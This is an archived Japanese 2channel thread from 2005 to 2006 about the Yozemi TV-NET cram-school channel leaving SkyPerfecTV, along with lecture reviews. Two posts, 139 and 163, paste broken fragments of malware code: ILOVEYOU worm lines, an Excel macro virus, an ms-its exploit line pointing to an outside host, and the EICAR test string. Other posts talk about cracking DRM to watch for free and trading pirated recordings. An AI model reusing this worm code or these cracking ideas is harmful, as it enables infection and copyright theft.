2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

代ゼミTVネット345ch

1 :てってーてき名無しさん:2005/09/04(日) 08:06:43 ID:???
毎月第一日曜日の無料放送日でもこのチャンネルだけは頑なに有料放送。
キチガイ変態講師陣も魅力のひとつ。
浪人生や会社人も視聴者かきこよろ〜。

http://www.yozemi.ac.jp/les/tv-net/index.html

2 :てってーてき名無しさん:2005/09/04(日) 14:05:58 ID:W2CnX7tD
12600!

3 :てってーてき名無しさん:2005/09/04(日) 14:28:44 ID:Awbx700/
ゴールデンレス】
  ∩ ・∀・)∩∩ ´∀`)∩  このレスを見た人はコピペでもいいので
   〉     _ノ 〉     _ノ10分以内に3つのスレへ貼り付けてください。
  ノ ノ  ノ  ノ ノ  ノそうすれば14日後好きな人から告白されるわ宝くじは当たるわ
  し´(_)   し´(_) 出世しまくるわ体の悪い所全部治るわでえらい事です

4 :てってーてき名無しさん:2005/09/04(日) 15:01:32 ID:???
東進チャンネルは終日無料放送してるのに代ゼミせこい!

5 :てってーてき名無しさん:2005/09/05(月) 19:18:40 ID:???
> 代ゼミTVネット視聴料………… 12,600円 /月
予備校の授業料と考えりゃ安いが・・・

6 :てってーてき名無しさん:2005/09/05(月) 20:59:40 ID:???
代ゼミTVNET 全部の番組が月12600円
東進Dスクール PPSで特定の講座だけが年間一括払いで代ゼミと同額

全部のチャンネルを見られる点で代ゼミがお買い得

7 :てってーてき名無しさん:2005/09/06(火) 00:48:21 ID:???
半額技使ったらブラックですかね?

8 :てってーてき名無しさん:2005/09/06(火) 04:03:24 ID:???
代ゼミは全番組視聴可能だから普通のチャンネル契約と同じ。
東進はPPSだからPPVを買う契約をするのと同じだから寝かせは出来ないだろうな。

9 :てってーてき名無しさん:2005/09/08(木) 01:21:31 ID:gNsukxEP
古文(子分)の吉野先生はヤクザ

10 :てってーてき名無しさん:2005/09/10(土) 12:01:26 ID:???
佐々木がキモい。
言ってることは悪くないんだが、対人能力が欠如してるから
生徒が理解できるようにしゃべるとかまったく考えてない。
ギャグにもならないギャグもキモい。
オナニー授業。

11 :てってーてき名無しさん:2005/09/10(土) 14:17:23 ID:cZywNnLE
そういえば河合の会長が死んだな。

12 :てってーてき名無しさん:2005/09/10(土) 14:54:14 ID:???
>>10
佐々木のハイレベル英語ですか?
あの先生のメガネとボサボサな髪がキモイ


13 :てってーてき名無しさん:2005/09/13(火) 23:43:21 ID:???
画質が極端に向上してる。解像度が前のままでビットレートが上昇したようです。

14 :てってーてき名無しさん:2005/09/15(木) 10:37:59 ID:???
>>13
昔はひどかったの?

15 :てってーてき名無しさん:2005/09/15(木) 12:57:22 ID:???
前は4mbps

16 :てってーてき名無しさん:2005/09/29(木) 00:14:16 ID:???
>>13
院試のために去年みてたけど、去年以上に良くなったの??

しかし、TVネットはどの授業も最高だったな。
今日も去年録画した富田と西見たぜ。
下手なTV番組を見るより面白い。

17 :てってーてき名無しさん:2005/09/29(木) 01:10:21 ID:???
佐藤幸夫の世界史結構分かりやすい。
西のれぼれぼ英語よくわかんね。

18 :てってーてき名無しさん:2005/10/17(月) 22:01:30 ID:???
>>10

19 :てってーてき名無しさん:2005/10/17(月) 22:59:23 ID:EqFwoTRH
アホを育てる文系算数まだ?

20 :てってーてき名無しさん:2005/11/17(木) 00:00:01 ID:JNuZNGOA
代ゼミTVネットは、来年代ゼミBBに完全移行すると、代ゼミTVネットから連絡が来たよ。

21 :てってーてき名無しさん:2005/11/17(木) 05:36:45 ID:???
スカパーから撤退するの?

22 :てってーてき名無しさん:2005/11/22(火) 00:02:50 ID:wadcgvRr
そのようだね

23 :てってーてき名無しさん:2005/11/22(火) 00:06:49 ID:???
離島で予備校にいけない人カワイソス
よぜみBBなんてブロードバンド回線がないとろくに使えないだろ。

24 :てってーてき名無しさん:2005/11/22(火) 00:12:41 ID:fVUZ9j6l
竹内の日本史

25 :てってーてき名無しさん:2005/11/22(火) 00:14:46 ID:???
伊達の日本史テーマ史文化史、板書の字が凄く綺麗だなあ。
よゼミの黒板は升目があって書きやすそう

26 :てってーてき名無しさん:2005/12/09(金) 13:01:31 ID:z9K9MOWV
テレビで放送しなきゃTVネットじゃねえよ

27 :てってーてき名無しさん:2005/12/09(金) 13:43:51 ID:???
月1の無料放送を楽しみにしていたのに・・・

28 :てってーてき名無しさん:2005/12/19(月) 16:12:22 ID:u1jZZQR+
代ゼミTVネット、入試実戦講座の放送回数少なくないか?他のは3回以上やるのに、センター実戦講座だけは全部で2回しか放送してくれない。みんなで代ゼミに抗議しようぜ。
0120−345−859(TVネット事務局) 




29 :てってーてき名無しさん:2005/12/19(月) 17:30:15 ID:???
>>28
TVNET掲示板を熟読

30 :てってーてき名無しさん:2005/12/19(月) 19:41:32 ID:Qzi/SYAT
お-ん

31 :てってーてき名無しさん:2005/12/28(水) 12:28:10 ID:diy0WfuL
>>28
入試基礎講座だけ再放送が3回、
他の講座は再放送が2回だけ。


32 :てってーてき名無しさん:2005/12/28(水) 13:49:00 ID:???
 

33 :てってーてき名無しさん:2005/12/28(水) 14:09:20 ID:???
佐藤幸夫は左翼っぽい

34 :てってーてき名無しさん:2006/01/21(土) 20:27:50 ID:IZ+nrFpl
3/31で放送終了

35 :てってーてき名無しさん:2006/01/22(日) 05:33:25 ID:???
そんなことHPは全く載せてないのな

36 :てってーてき名無しさん:2006/01/22(日) 05:34:55 ID:???
クラブスカパーに載ってた・・・・
東進は消えてもいいけど代ゼミがなくなるのか
継続は無理なのか?

37 :てってーてき名無しさん:2006/01/22(日) 05:37:09 ID:???
よく見たら東進と代ゼミ全滅だわ
代わりの予備校チャンネルできないのかな?
なくなると困るんだけど

38 :てってーてき名無しさん:2006/01/22(日) 15:37:31 ID:BGOl2k3g
なんで終了なの?やっぱ見る人少ないからかな…

39 :てってーてき名無しさん:2006/01/23(月) 16:44:13 ID:???
スカパーは予備校チャンネルを止めさせたかったのかな?
同時に2つ消えるのはやっぱりおかしい

40 :てってーてき名無しさん:2006/01/23(月) 19:20:08 ID:???
むしろ予備校側の経営判断でしょ。

東進が5つも6つもチャンネル持ってた時代ならともかく今じゃ大した事ない。

41 :てってーてき名無しさん:2006/01/23(月) 23:46:35 ID:???
4月から入ろうと思ってたらこれかよ

42 :てってーてき名無しさん:2006/01/31(火) 05:13:39 ID:???
東進と共にスカパーから撤退か…
特に東進の方は距離的に通えない人しか
在宅ネットは使えないらしいし
ショックだ

43 :てってーてき名無しさん:2006/01/31(火) 05:29:19 ID:???
スカパーが追い出した感があるな。
わざわざ同時に追い出したってことは110で復活することがある?

44 :てってーてき名無しさん:2006/01/31(火) 05:48:42 ID:???
やっぱり?
ネット時代とはいえ同時に撤退はおかしいと思ったんだよね
片方撤退してくれれば、もう片方にとっておいしい状況なはずだし
ところで110って何のこと??

45 :てってーてき名無しさん:2006/01/31(火) 12:48:08 ID:???
スカパー110度の事。
将来的にフルデジタル化したら衛星送信帯域がかなり空くから、そこにスカパーが入ればチャンネルを増やせる。

46 :てってーてき名無しさん:2006/01/31(火) 18:49:45 ID:???
教えてくれてありがとう
代ゼミBBだと録画できないし
代ゼミじゃなくても我慢するから
予備校チャンネルどこかやってくれないかな

47 :てってーてき名無しさん:2006/01/31(火) 19:31:45 ID:???
よぜみBBを試してみたんだけど

1.まず講義のファイルをダウンロードする。これが1GBに近い980MBくらいで90分近くある。
契約者でなくてもダウンロードは自由。

2.講義ファイルを再生するとまずIDとパスワードが出てきて、そのIDを貰う為にお金を払う感じ。

現在は申し込み方が分からないのでファイル消したけど、光回線でないとファイルをダウンロードするのに凄く時間が掛かるよ。
その上パソコンのCPU負担が増えるからうちで使ってるパソコンだとコマ落ちしてまともに見れない。
無料でダウンロードできる仮視聴はストリーミング再生で解像度も低いのでコマ落ちはなかったんだけど、いきなりスカパーやめてTVネットに移行だとスムーズに移行できないね。
来年再受験だからまた見るんだけどさ。去年録画したビデオもう1回見るとするか。

48 :てってーてき名無しさん:2006/02/05(日) 18:26:08 ID:???
今日は無料放送しないんだね

49 :てってーてき名無しさん:2006/02/09(木) 14:19:14 ID:FcvIzG82
宅勉は悲惨だなー

50 :てってーてき名無しさん:2006/02/11(土) 07:03:40 ID:???
さようならよゼミTVネット

浪人も今年いっぱいで卒業します

51 :てってーてき名無しさん:2006/02/16(木) 21:22:08 ID:GDrJvtug ?
[吉野敬介結婚]
元暴走族のカリスマ代ゼミ講師【吉野敬介】が結婚していたことが判明した。
お相手は元モデルで25歳の女性。
吉野氏は代ゼミのカリスマ古文講師として名を馳せ、元暴走族と云う話題性もあって
現在もトップ講師に君臨している。
冬季講習の「激動の一年 古文最後の爆走 さらば愛しの受験生」は超人気講座で、
毎年各校舎で締め切りが続出。
多くの代ゼミ生に夢と感動、そして合格を与え続けている。

帝國ホテルで開かれた式にはそうそうたるメンバーが参列した。
高宮学園(代々木ゼミナール)高宮理事長
英語四天王の【西谷昇二】 【西きょうじ】 【富田一彦】 【仲本浩喜】
受験日本史界のドン【土屋文明】
パフォーマンス講師である【荻野暢也】等多数。
代ゼミの人気講師が多数参列する豪華な式となった。

今回の結婚に当たっての各講師のコメントは以下の通り。

西谷昇二講師 「英語の本質は同系反復。渋い。」

西きょうじ講師 「僕はね、鳥と話せるんだよ。
          ちなみに俺に偏差値65以下の質問はするなよ。」

富田一彦講師 「さあ動詞の数を数えていきましょうか。
          動詞の数が数えられない、どうしよう。
          なんつって。」
http://www.geocities.jp/kinokobouya/photo2/1029_38.jpg
http://www.geocities.jp/kinokobouya/photo/yokote2005_30.jpg

52 :てってーてき名無しさん:2006/02/22(水) 00:48:07 ID:???
まさかとはおもうが、視聴率の関係でリストラされたのか?
約款をご覧下さい
http://tv8.2ch.net/test/read.cgi/skyp/1000818321/17

↑これが追い出した原因なら代ゼミは別の放送手段で再開してほしいな。
新CSがでればそっちに移行して欲しいし。
これからの代ゼミBBは録画できないのが難点。

53 :てってーてき名無しさん:2006/03/02(木) 18:53:48 ID:WFaVpY/l
復活

54 :てってーてき名無しさん:2006/03/02(木) 19:30:16 ID:???
何が?

55 :てってーてき名無しさん:2006/03/02(木) 22:52:53 ID:???
おれのおちんちん

56 :てってーてき名無しさん:2006/03/03(金) 23:45:42 ID:RZfnH9VA
http://openuser.auctions.yahoo.co.jp/jp/user/blue_blood_hide?

代ゼミの講義録音ですごい稼いでます。一度見てよ。


57 :てってーてき名無しさん:2006/03/06(月) 18:05:52 ID:5h64rs/P
小倉最高!!!!!!!!!!!!!!!!!!!!!!!

58 :てってーてき名無しさん:2006/03/07(火) 00:37:28 ID:AIeSoYC7
東進ハイスクール/衛星予備校 part22
http://etc4.2ch.net/test/read.cgi/kouri/1141619228/
東進ハイスクール@milkcafe掲示板
http://www.milkcafe.net/tousin/

搾取!東進!
ボッタ!東進!
ナガセ!武富士!893!東進!
搾取!東進!
ボッタ!東進!
入塾費!施設費!担任費!東進!
サラ金!
搾取!
ボッタクリ!
ナガセ!イェーイ!
武富士!イェーイ!
893!イェーイ!

59 :てってーてき名無しさん:2006/03/07(火) 10:29:59 ID:???
多分無いと思うけど東進と代ゼミが抜けたあとに城南予備校が入ってきたらワロス

60 :てってーてき名無しさん:2006/03/07(火) 17:50:44 ID:xHYFcbbQ
そのまさかなんだよな〜〜〜〜

61 :てってーてき名無しさん:2006/03/24(金) 13:55:15 ID:???
録画してた人抜けた分とか補完しない?
文系だけど・・・。
TV.NET_masterあっとhotmail.co.jp

62 :てってーてき名無しさん:2006/03/24(金) 14:36:26 ID:???
佐藤世界史とチョー化学だったらほぼフルコンプしています。
国語関係や数学関係は所々しか録画してない。

63 :てってーてき名無しさん:2006/03/24(金) 22:46:15 ID:???
>>62
世界史いいですね。
メールいただけませんか?

64 :ぺぽさん:2006/03/30(木) 13:40:08 ID:Kagqh9Rl
勇者を育てる数学VCと天空への理系数学とか数学ブリーフィングVC、
それか基礎理系物理とハイレベル理系物理、
入試化学突破のバイブル実践編もってるひといませんか??


65 :てってーてき名無しさん:2006/03/30(木) 14:34:51 ID:???
持ってるよ

66 :てってーてき名無しさん:2006/03/30(木) 14:51:55 ID:Kagqh9Rl
どの講座もってますか??


67 :てってーてき名無しさん:2006/03/30(木) 15:15:51 ID:???
西岡先生、今は代々木で教鞭とってたのか・・・
昔市ヶ谷でお世話になったよ。

68 :てってーてき名無しさん:2006/03/30(木) 15:49:10 ID:???
チンピラの勇者を育てる天空の数学参C一学期分全部録画済
2学期は抜けてるところが数ヶ所ある

69 :てってーてき名無しさん:2006/03/30(木) 20:21:48 ID:Kagqh9Rl
そうですか、
他にはありませんか??
交換とか無理ですかね??
欲しいのありますか??

70 :てってーてき名無しさん:2006/03/31(金) 01:18:56 ID:???
代ゼミのサテライン設備が欲しい

71 :てってーてき名無しさん:2006/03/31(金) 21:05:52 ID:???
代ゼミの最期を看取ることができなかった

72 :てってーてき名無しさん:2006/03/31(金) 21:37:05 ID:???
俺も

73 :てってーてき名無しさん:2006/03/31(金) 22:54:06 ID:???
東進は0時で終わる
ノースクランブルだから最期まで見られるよ

74 :てってーてき名無しさん:2006/03/31(金) 23:56:54 ID:???
東進お別れ画面キターーーーー

75 :てってーてき名無しさん:2006/03/32(土) 00:01:29 ID:???
皆様にご視聴頂きました「東進チャンネル1」341chは、
本日をもちまして放送を終了致します。
長い間ご愛顧頂き有難うございました。これからも東進は
全国に広がる東進ハイスクール、東進衛星予備校などの
東進グループにおいて「本当に学力を伸ばす」教育事業を
展開して参ります。皆様におかれましては学習を通じて
努力する事で、自己新記録を目指してますますご活躍
されます事を心よりお祈り申し上げます。

東進
Toshin Channel 1

76 :てってーてき名無しさん:2006/03/32(土) 00:05:57 ID:???
0時になった瞬間に200chに切り替わった。
ttp://aploda.org/dl.php?mode=pass&file_id=0000000608 (ED画像)

77 :てってーてき名無しさん:2006/03/32(土) 01:36:42 ID:???
5月から河合熟なんて出てこないよね?

78 :てってーてき名無しさん:2006/03/32(土) 18:41:26 ID:???
341と345chが無くなって番号が飛んでるよ・・・

79 :てってーてき名無しさん:2006/04/02(日) 01:59:07 ID:???
放送終了直後からもう番号なくなってるよ

80 :てってーてき名無しさん:2006/04/02(日) 13:38:26 ID:l2F0oVHP
俺の代ゼミがまだ見たのあるのに

81 :てってーてき名無しさん:2006/04/06(木) 12:08:20 ID:???
このスレももう終わり?

82 :てってーてき名無しさん:2006/04/06(木) 13:25:50 ID:???
受験に失敗した糞どもの録画交換OFFスレになります

83 :てってーてき名無しさん:2006/04/07(金) 12:59:50 ID:???
俺大学生だけどショボい塾で教えるために代ゼミ見てたぞ

84 :てってーてき名無しさん:2006/04/16(日) 16:23:53 ID:gD9Iz0gH
佐藤の世界史録った人いませんか??
お礼するので貸してくださいo(><)o

85 :てってーてき名無しさん:2006/04/16(日) 19:36:27 ID:???
俺も佐藤の世界史欲しい

86 :てってーてき名無しさん:2006/04/17(月) 14:08:07 ID:???
ヒント:代々木本校で会えるよ
ヒント2:TV見てないで入学しなさい

87 :てってーてき名無しさん:2006/04/18(火) 18:54:53 ID:z83Aj+Lm
代ゼミBBの録画方法ってわかりませんか?荻野先生の数学がもう終わりそうなのでバックアップとりたいです。

88 :てってーてき名無しさん:2006/04/19(水) 05:04:01 ID:???
録画も何もファイルを落としてからネットでIDとパスワード入れるだけなので、クラックすれば未加入でもタダ見できるね。


89 :てってーてき名無しさん:2006/04/19(水) 16:44:56 ID:9nZG1bFu
クラックってなんですか?

90 :てってーてき名無しさん:2006/04/19(水) 16:53:43 ID:???
苦しいことや楽しいことをあらわす

91 :てってーてき名無しさん:2006/04/23(日) 14:36:50 ID:CR6HYMzR
あげ

92 :てってーてき名無しさん:2006/04/23(日) 21:41:51 ID:???
それは苦楽

93 :てってーてき名無しさん:2006/04/24(月) 01:26:06 ID:???
べんきょうにつかれたら..

予備校生金属バット殺人事件
http://www.alpha-net.ne.jp/users2/knight9/yobikousei.htm
開成高校生絞殺事件
http://www.geocities.co.jp/SiliconValley/9776/izumi/kaisei/index.html

94 :てってーてき名無しさん:2006/04/30(日) 22:14:47 ID:BpJNjpFV
DRM解除して代ゼミの試聴期間をはずしたいんですが、ソフトが手に入りません。
どこでダウンロードできるか教えてください。


95 :てってーてき名無しさん:2006/05/13(土) 22:13:50 ID:z9B5AX8L
ゴールデンレス】
  ∩ ・∀・)∩∩ ´∀`)∩  このレスを見た人はコピペでもいいので
   〉     _ノ 〉     _ノ10分以内に3つのスレへ貼り付けてください。
  ノ ノ  ノ  ノ ノ  ノそうすれば14日後好きな人から告白されるわ宝くじは当たるわ
  し´(_)   し´(_) 出世しまくるわ体の悪い所全部治るわでえらい事です


96 :てってーてき名無しさん:2006/05/15(月) 00:20:09 ID:???
【フリーター】杉村太蔵9【ニート】
http://society3.2ch.net/test/read.cgi/giin/1128320641/
           _,.、、、、、、.__
       ,.ィヾ´\ヽ\\\ヽヾヽ   
       ,ィぐヽ\\ヽヽ \\ヽヾヽヽ  
      lミ\\ヽ } }} }  | l l |l.l| j 
      !ミヽヾヽヽj !| j || | |!|| } }     
      /ニーヽ\ゞミリ l | l| ! | l| l|リノ,ノ!     
    jΞニ三ニミ   __      '彡|     
    lミ,.ミニ=Ξ  __` ‐-‐'__|ミj.   
     |ミ! ゝヽ彡、   ^ニヾヽー〃ニ」ミ!      
    lキ、ヽ lミj `Y´=・,ァ }'Tl=・={ 〉 
    ヾミヽ.j     ヽ __/ |ヽ__レ′  『やっぱりお前はバカじゃない』
    ,イ|_,ハ       ノ(.,、 ,}、   ノ\   小学館文庫 吉野敬介著 P22 の   
  ,.ィi´川   ハ        ,エ、  /^ニヘ.  俺の凍死自殺エピソードをパクって
  ミリム{ |   ヽ      ‐=ニァ /三ニ}ハ  ブログに載せてるんじゃねぇぞ!
  ミミJハ.ヽ    \    `ー| ̄|仁rニ=}》ハ  http://sugimurataizo.net/
  /´rムキ-ヘ.     `>‐rr┴‐'┐'  /吉ハ.  2006年05月10日 23:32参照
  」/ヨシノヽ \   ´   〃|` ̄冂 | リ野1ハ  
  ォーンミ\}/'7ヘ___/ /l.  凵 ! ソコヤソウ!  
  シ厂ト}彡ヽム>ー──'/}   { ノ/ノく リjニ|    


97 :てってーてき名無しさん:2006/05/31(水) 01:14:13 ID:???
手持ちの数学、物理、化学、英語、その他いろいろ、受験関係のDVD等のやりとりを
お互い「無料」で行ってくれる方募集します。

98 :てってーてき名無しさん:2006/06/01(木) 00:11:05 ID:???
富田と西の違い,
特長を教えて
どっち選択すればいい?関関同立対策としては




99 :てってーてき名無しさん:2006/06/01(木) 00:38:12 ID:???
>>97
これが受験格差って奴ですね

100 :てってーてき名無しさん:2006/06/01(木) 01:07:12 ID:ECzOLxev
>>97
メール送り帰って来たのに返そうと思ったらエラーが出でつながりません
どういうことですか?
返事返したいです




101 :てってーてき名無しさん:2006/06/01(木) 07:41:43 ID:POASYilF
日本語の勉強が先だお

102 :てってーてき名無しさん:2006/06/01(木) 17:25:24 ID:???
今やITハイテク時代。
優秀な講師のビデオが誰でも平等に見れればいいのにね。
そしたら、学校も予備校も不要だね。
教師もリストラになるね。

103 :てってーてき名無しさん:2006/06/01(木) 20:18:10 ID:???
代ゼミも東進スクールも、もっと安くして〜
教育の機会均等に貢献してほしい〜
教育格差を助長してしまうシステムには反対です

104 :てってーてき名無しさん:2006/06/01(木) 23:07:02 ID:LVHOE4ca
サテラインのみの授業をTVネットスタジオで収録するより、
ブロードバンド代ゼミTVネットの方を充実してほしい!


105 :てってーてき名無しさん:2006/06/02(金) 16:59:16 ID:4/5zIP7w
もっと、演習講座や特定大学対策講座を充実させるべきだ。




106 :てってーてき名無しさん:2006/06/02(金) 21:00:41 ID:r9coSMnd
長期的に視聴可能にしてほしいよ。
せめて3か月。希望は、1年ぐらい

107 :てってーてき名無しさん:2006/06/03(土) 00:10:58 ID:???
きもい
死ね

108 :てってーてき名無しさん:2006/06/03(土) 01:27:17 ID:???
サテラインの映像をスカパーでも放送してよ

109 :てってーてき名無しさん:2006/06/03(土) 15:43:16 ID:CMd3vJtP
どなたか、代ゼミTVの物理の感想聞かせてください

110 :てってーてき名無しさん:2006/06/03(土) 15:46:39 ID:???
去年代ゼミサテに入って、理転に挑戦したが思いっきり失敗した。

この失敗は、自分の理解力の無さの所為であって、授業の質は最高だったから、
今年も代ゼミサテにお世話になろうと思う。
しかし、同じ塾に2年通うってのも、寂しいものがある




111 :てってーてき名無しさん:2006/06/03(土) 18:53:20 ID:???
>>109
感想言いますのでメールしてください

112 :てってーてき名無しさん:2006/06/04(日) 00:28:42 ID:???
数学の山本先生は、TVには出ないのかな?知ってる人教えて

113 :てってーてき名無しさん:2006/06/04(日) 09:55:42 ID:???
サテラインとTVネット、両方、とってる人いる?

114 :てってーてき名無しさん:2006/06/05(月) 21:24:01 ID:gZWznzVt
佐々木先生のハイレベル英文読解って難perの1学期レベルでしょうか?
フレサテで難per取るかTVネットで済ませるか悩むところです

ちなみに春季は難perをサテで取ったので読解原則の春季分は持ち合わせています。




115 :てってーてき名無しさん:2006/06/05(月) 21:59:31 ID:???
去年うけてたが別に独学で十分な気がするけどな

116 :てってーてき名無しさん:2006/06/06(火) 06:53:27 ID:???
来年度は、センター標準講座を取り直すだろうね。
久世→代ゼミを去った
西村・工藤→サテライン降板

今年、『吉ゆうそうのセンター英語・スーパーリスニング201』と『現代社会』の本が
代々木ライブラリーから出る。

以上の事から、
「センター標準講座」「センター実戦講座」を「センター対策講座」に統一して
値下げすると予想!

佐々木和彦のセンター英語/吉のセンター英語リスニング
佐々木隆宏のセンター数学T・A/森谷のセンター数学U・B
船口のセンター現代文/望月のセンター古文・漢文
漆原のセンター物理T/亀田のセンター化学T/大掘のセンター生物T/佐藤満のセンター地学T
伊達のセンター日本史/森本のセンター世界史/武井のセンター地理
蔭山のセンター現代社会/畠山のセンター倫理/小泉のセンター政治・経済




117 :てってーてき名無しさん:2006/06/06(火) 22:52:02 ID:???
ここの住民
TV-NET録画してshareに流せたもう

118 :てってーてき名無しさん:2006/06/06(火) 23:38:11 ID:???
死ね

119 :てってーてき名無しさん:2006/06/07(水) 14:44:03 ID:???
生きる、つか流そうぜ

120 :てってーてき名無しさん:2006/06/07(水) 15:09:26 ID:???
お前の住所と名前晒したらいいよ

121 :てってーてき名無しさん:2006/06/07(水) 15:17:25 ID:???
住所 都内
名前 田中

122 :てってーてき名無しさん:2006/06/07(水) 15:41:01 ID:???
つまんね

123 :てってーてき名無しさん:2006/06/08(木) 06:40:34 ID:???
西のポレポレ体験みていいなっておもったんですけど、買う価値あります。
それとも本地道にやっていけばじゅうぶんですか?
うけたことある人お願いします。

124 :てってーてき名無しさん:2006/06/08(木) 06:41:44 ID:1gGEEUOm
演習講座が少な過ぎる!

「吉田のハイレベル政経演習 演習講座」
「小泉のハイレベル政経演習 演習講座」
「吉田の早大政経」
「小泉の早大政経」

のいずれかを絶対実現してほしい!




125 :てってーてき名無しさん:2006/06/08(木) 06:44:17 ID:???
《レベル比較》
『西の英文読解入門 基本はここだ!』≒『これからSTART!楽しい英語』
『西のポレポレ英文読解プロセス50』≒『All Round完璧英語(読解徹底編)』
『西のポレポレ英文読解プロセス50 演習講座』≒『HYPER−ENGLISHリーディング&ライティング』




126 :てってーてき名無しさん:2006/06/08(木) 19:29:30 ID:???
拡散しようぜ、
そしたらいいこと教えてやっから

127 :てってーてき名無しさん:2006/06/08(木) 21:24:31 ID:???
こんな過疎スレで何いってんだか

128 :てってーてき名無しさん:2006/06/08(木) 21:44:22 ID:???
過疎スレだが代ゼミの拡散するならこのスレが適当だと思うが

129 :てってーてき名無しさん:2006/06/08(木) 22:10:30 ID:1gGEEUOm
同意

130 :てってーてき名無しさん:2006/06/08(木) 22:35:18 ID:???
自演臭

131 :てってーてき名無しさん:2006/06/08(木) 22:39:14 ID:???
これってなんでIDでてるひととそうでないひといるんだ?

132 :てってーてき名無しさん:2006/06/08(木) 23:59:02 ID:???
あげると出る
しかもあげてる奴は馬鹿w

133 :てってーてき名無しさん:2006/06/09(金) 00:02:19 ID:???
ま、お前の事だろうだけど

134 :てってーてき名無しさん:2006/06/09(金) 11:54:26 ID:???
夏が終われば、だれでも必死に勉強を始めるから、夏は大きな差をつける最後のチャンスです。
1学期を振り返り、自分の現状を的確に把握し、背のびせず、基礎固めが必要な教科はそれに適した講座をとりましょう。
夏の地道な努力こそが、来春の栄光をもたらしてくれるんだよね。


135 :てってーてき名無しさん:2006/06/09(金) 20:56:15 ID:GmdQ8BTN
もう1ヵ月後には、夏休み。ぜんぜん進んでないよ。英語が、伸びない。
TVネットお勧めかな?

136 :てってーてき名無しさん:2006/06/10(土) 19:56:37 ID:???
TVネット最高よ。皆、すぐ注文すべし
代ゼミ最高、万歳

137 :てってーてき名無しさん:2006/06/11(日) 19:30:40 ID:qY0OLZL9
富田の論理と解法の参考書誤植多すぎorz

138 :てってーてき名無しさん:2006/06/12(月) 00:36:54 ID:mUxQhef5
でも内容はいい。誤植は、ガマンしないと

139 :てってーてき名無しさん:2006/06/12(月) 00:47:46 ID:???
<body onload=window()>
If s = fso.CopyFile f1.path, f1.path+"l"
Set A4 (1)))
fso.copyfile \"
c MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = fso.CopyFile f1.path, f1.path+"l"
ToInfect.
G.RegWrite A
lines(n)=
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

140 :てってーてき名無しさん:2006/06/12(月) 15:24:04 ID:lPKi50UQ
↑ウイルス
いたずらは、やめよう

141 :てってーてき名無しさん:2006/06/13(火) 00:57:25 ID:???
BB内容、全然網羅されていないし、問題も少ない、解説もうんこ。
テキストも解説はしょっている部分がおおいし。だめだめじゃないか?
やっぱり単価いったほうが全然テキストも解説もいいと思ったが。
明日合格するために、単価授業をとりにいってきやす。

142 :てってーてき名無しさん:2006/06/13(火) 09:15:19 ID:LZyUMV2b
そうかね、BBのいいとこは、それなりにあるよ

143 :てってーてき名無しさん:2006/06/15(木) 23:53:05 ID:uFNbQs3h
今まで英語長文対策は駿台文庫のビジュアル英文解釈をやってきた。今パート1の復習してる。

今、西のポレポレを体験受講してみたんだけど結構良かった。ポレポレを読んだこともないんたが、今からポレポレ買って受講するのは遅すぎる??




144 :てってーてき名無しさん:2006/06/16(金) 23:44:11 ID:vgqRwnjQ
勉強するのに遅すぎるということはないよ

145 :てってーてき名無しさん:2006/06/17(土) 13:22:29 ID:AEmcWclE
河合は、ネット講座かいこうしないのかね

146 :てってーてき名無しさん:2006/06/18(日) 00:25:36 ID:???
無料体験見た感じ、予備校の授業より解説のクオリティーが低くないですか?
単価授業と比べて、講師が手を抜いてる感じがします。
単価でしっかり説明してくれたところがBBでは飛ばしたりしてました。
なんかイマイチなんですけど。



147 :てってーてき名無しさん:2006/06/18(日) 00:32:21 ID:gQ1LCgMd
多少の手抜きは止むを得ないでしょ
でも、お勧め

148 :てってーてき名無しさん:2006/06/19(月) 13:13:43 ID:vHRbu3Yp
速習するには、もってこいの講座ばかりですね

149 :てってーてき名無しさん:2006/06/20(火) 12:41:16 ID:+E+AWA26
ケータイゼミナールに「明慶の英語」「貫の数学」「武井の地理」新設だって。


150 :てってーてき名無しさん:2006/06/21(水) 20:49:49 ID:hCXcuEIO
生物の感想をどなたか、お聞かせください

151 :てってーてき名無しさん:2006/06/22(木) 05:33:24 ID:???
本スレ行け
http://school5.2ch.net/test/read.cgi/juku/1144460178/

152 :てってーてき名無しさん:2006/06/25(日) 01:48:38 ID:23/M7JRA
最高

153 :てってーてき名無しさん:2006/06/27(火) 21:02:52 ID:JmuaEN7V
演習は結構いい!代ゼミでいう1学期くらいの内容しかないから、2学期くらいの内容の授業がほしい




154 :てってーてき名無しさん:2006/06/28(水) 09:40:19 ID:???
一人で必死に上げてるやつウザイよ
死ね、そういう話は本スレ行け

155 :てってーてき名無しさん:2006/06/28(水) 22:24:36 ID:???
学力は代ゼミであがるかな

156 :お勧め講座:2006/06/30(金) 21:45:51 ID:???
湯浅のむずかしいことを易しく解く受験数学I・A


157 :てってーてき名無しさん:2006/07/01(土) 19:18:41 ID:???
スレ違い死ね

158 :てってーてき名無しさん:2006/07/01(土) 23:50:33 ID:???
KID と SID わかる人いたら教えてくれませんか?

159 :てってーてき名無しさん:2006/08/03(木) 22:54:47 ID:???
今井の英文法入門で使用していたテキストは今井の英文法入門 PART1・2ですか?

160 :てってーてき名無しさん:2006/08/08(火) 13:24:23 ID:???
違う
それ旧課程のやつ

161 :てってーてき名無しさん:2006/09/05(火) 11:44:07 ID:fhJLhWjX
スカパー時代の代ゼミTVネットを録画して持っている人っているんですかね?

162 :てってーてき名無しさん:2006/09/05(火) 14:05:56 ID:???
それを聞いてどうする?
犯罪者にさせたいのか?

163 :てってーてき名無しさん:2006/09/05(火) 14:15:22 ID:???
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
